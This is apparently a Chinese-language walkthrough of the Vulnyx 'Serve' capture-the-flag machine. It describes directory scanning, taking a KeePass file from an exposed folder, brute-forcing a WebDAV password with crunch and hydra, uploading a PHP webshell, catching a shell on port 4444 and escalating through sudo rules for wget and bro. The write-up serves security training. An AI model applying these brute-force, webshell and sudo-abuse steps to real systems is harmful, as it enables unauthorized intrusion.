Vulnyx-Serve-Walkthrough
信息收集
服务探测
BASH
1 | ❯ sudo arp-scan -l |
扫一下目录
得到一个提示
BASH
1 | ❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log -b 403,404 |
敏感文件泄露
那我们添加后缀再次扫描一下/secrets
目录,怀疑凭证是存在kdbx
BASH
1 | ❯ gobuster dir -u http://$ip/secrets -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log,kdbx -b 403,404 |
下载到本地,打开一下
得到WebDAV
的凭证 admin:w3bd4vXXX
根据提示后面三位需要爆破
BASH
1 | ❯ wget http://192.168.60.210/secrets/db.kdbx |
利用crunch
生成字典,hydra
爆破即可
得到密码w3bd4v513
BASH
1 | ❯ crunch 9 9 -t w3bd4v%%% -o dic.txt |
WebDav上传
利用davtest
可以测试上传的文件类型
BASH
1 | ❯ davtest -auth admin:w3bd4v513 -move -sendbd auto -url http://$ip/webdav |
发现可以上传php类型的文件,利用cadaver
上传个webshell
BASH
1 | ❯ cadaver http://$ip/webdav |
用户提权
监听端口
存在teo
用户
BASH
1 | ❯ pwncat-cs -lp 4444 |
同时www-data
拥有teo
的sudo权限
可以执行wget
BASH
1 | (remote) www-data@serve:/$ sudo -l |
Root提权
teo
用户也有sudo权限,可以执行/usr/local/bin/bro
发现是调用Bropages
其实这就是一个类似man pages的工具
可以直接提权
BASH
1 | teo@serve:~$ sudo -l |